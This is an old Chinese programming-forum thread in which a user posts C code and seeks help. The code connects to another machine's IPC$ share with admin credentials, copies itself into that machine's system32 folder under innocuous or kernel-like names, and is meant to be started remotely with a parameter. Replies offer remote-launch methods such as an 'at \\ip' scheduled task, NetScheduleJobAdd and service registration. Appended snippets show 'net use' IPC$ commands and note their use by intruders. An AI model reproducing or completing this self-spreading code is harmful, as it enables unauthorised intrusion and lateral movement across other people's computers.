社区
网络编程
帖子详情
高手指点:已经同对方取得管理员的IPC连接,并把程序拷到对方的系统目录下,请问这时如何启动此程序(控制台,带参数)
wzswgbx
2003-08-21 01:04:44
高手指点:已经同对方取得管理员的IPC$连接,并把程序拷到对方的系统目录下,请问这时如何启动此程序(控制台,带参数)
...全文
25
7
打赏
收藏
高手指点:已经同对方取得管理员的IPC连接,并把程序拷到对方的系统目录下,请问这时如何启动此程序(控制台,带参数)
高手指点:已经同对方取得管理员的IPC$连接,并把程序拷到对方的系统目录下,请问这时如何启动此程序(控制台,带参数)
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
7 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
wzswgbx
2003-08-21
打赏
举报
回复
帖源码,在???????处希高手指点,欢迎访问站点www.fz5fz.org
#include <windows.h>
#include <stdio.h>
#include <Winnetwk.h>
#pragma comment(lib,"Mpr.lib")
#define BUFFER_SIZE 1024
void CopytoHost(char *lpHost)
{
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char *lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
if(lpHost==NULL)//未指定机名或IP地址
{
GetSystemDirectory(lpImagePath,MAX_PATH);//获取系统路径
strcat(lpImagePath,"\\ntkrnl.exe");
lpHostName=NULL;
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\aaa.exe",lpHost);
lpHostName=(char *)malloc(256);
sprintf(lpHostName,"\\\\%s",lpHost);
}
printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5)
{
printf("Failure ... Access is Denied !\n");
}
else
{
printf("Failure !\n");
}
return ;
}
else
{
printf("Success !\n");
}
}
else
{
printf("already Exists !\n");
FindClose(hSearch);
}
}
//以某一用户名和密码连接对方的IPC:bConnect==TURE时连接;FALSE时断开连接lpHost为对方IP或机名
BOOL ConnectRemote(BOOL bConnect,char *lpHost,char *lpUserName,char *lpPassword)
{
char lpIPC[256];
DWORD dwErrorCode;
NETRESOURCE NetResource;
sprintf(lpIPC,"\\\\%s\\ipc$",lpHost);
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;
if(!stricmp(lpPassword,"NULL"))
{
lpPassword=NULL;
}
if(bConnect)
{
printf("Now Connecting ...... ");
while(1)
{
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
if((dwErrorCode==ERROR_ALREADY_ASSIGNED) || (dwErrorCode==ERROR_DEVICE_ALREADY_REMEMBERED))
{
WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
}
else if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
break;
}
else
{
printf("Failure !\n");
return FALSE;
}
Sleep(10);
}
}
else
{
printf("Now Disconnecting ... ");
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
}
else
{
printf("Failure !\n");
return FALSE;
}
}
return TRUE;
}
int main(int argc,char *argv[])
{
if(argc==2&&stricmp(argv[1],"y")==0)
{
printf("run!\n");
return 0;
}
if(argc==5)
{
if(ConnectRemote(TRUE,argv[2],argv[3],argv[4])==FALSE)
{
printf("can not connect %s!\n",argv[2]);
return -1;
}
CopytoHost(argv[2]);
//?????????????????????????????????????在这里我要让对方启动我刚传过去的本程序并给其命令行参数 y
return 0;
}
return 0;
}
wzswgbx
2003-08-21
打赏
举报
回复
问了T0o2y,建议我调用netapi32.dll中的NetScheduleJobAdd函数,有没有人用过这个函数的,MSDN丢了,这个函数的运行环境等无法查,哪位高手用过???
wzswgbx
2003-08-21
打赏
举报
回复
要编程即刻实现,不用AT命令
chchch
2003-08-21
打赏
举报
回复
你可以把你的程序做成后台服务,然后在另一台机器可以通过程序注册到服务管理器,然后在通过程序启动.不过这样要求对方是NT体系的,包括2000和XP.
98下你也可以注册为后台进程,然后启动进程.
pushser
2003-08-21
打赏
举报
回复
at \\ip 18:35 C:\winnt\system32\cmd.exe
wzswgbx
2003-08-21
打赏
举报
回复
大哥,你这是在自己的机上运行啊
xiaoxx
2003-08-21
打赏
举报
回复
SHELLEXECUTEINFO sei;
ZeroMemory(&sei,sizeof(sei));
sei.cbSize = sizeof(sei);
sei.nShow = SW_SHOW;
sei.hwnd = GetDesktopWindow();
//设置sei的lpParameters属性为你要执行的文件
bool bSuccess = ShellExecuteEx(&sei);
Windows使用dos命令建立
ipc
$
连接
并远程拷贝文件
使用dos命令建立
ipc
$通道
连接
,并向远程主机发送文件 关于
ipc
$
连接
请查考:https://baike.baidu.com/item/空
连接
/1993355?fr=aladdin&fromid=9482475&fromtitle=
ipc
%24 1.建立
ipc
$
连接
net use \\192.168.1.5\
ipc
$ "password" /user:"Administra...
IPC
连接
IPC
$是Windows系统特有的一项管理功能,是微软公司为了方便用户使用计算机而设计的,主要用来远程管理计算机的。但事实上使用这个功能最多的人不是网络
管理员
,而是“入侵者”!他们通过建立
IPC
$
连接
与远程主机实现通信和控制。通过
IPC
$
连接
的建立,入侵者能够做到: è 建立、拷贝、删除远程计算机文件; è 在远程计算机上执行命令。 2.1.1 远程文件操作 1.相关知识 (1)什么是I
ipc
$
连接
失败的常见原因
以下是一些常见的导致
ipc
$
连接
失败的原因: 1
IPC
连接
是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立
ipc
$
连接
,98/me是不能建立
ipc
$
连接
的; 2 如果想成功的建立一个
ipc
$
连接
,就需要对方开启
ipc
$共享,即使是空
连接
也是
Windows
IPC
连接
详解
前言 最近在看一些渗透测试的教程。打算把一些东西实践实践,加深一下印象! 今天就来看看
IPC
连接
。虽然很老,但是很经典。 正文 什么是
IPC
?
IPC
(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 一、建立
IPC
连接
...
ipc
$与默认共享及
ipc
$
连接
失败的原因
ipc
$与默认共享 默认共享是为了方便
管理员
远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和
系统目录
winnt或windows(admin$),我们通过
ipc
$
连接
可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
ipc
$
连接
失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以上操作系统; 2)对方没有打开
ipc
$默...
网络编程
18,356
社区成员
64,214
社区内容
发帖
与我相关
我的任务
网络编程
VC/MFC 网络编程
复制链接
扫一扫
分享
社区描述
VC/MFC 网络编程
c++
c语言
开发语言
技术论坛(原bbs)
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章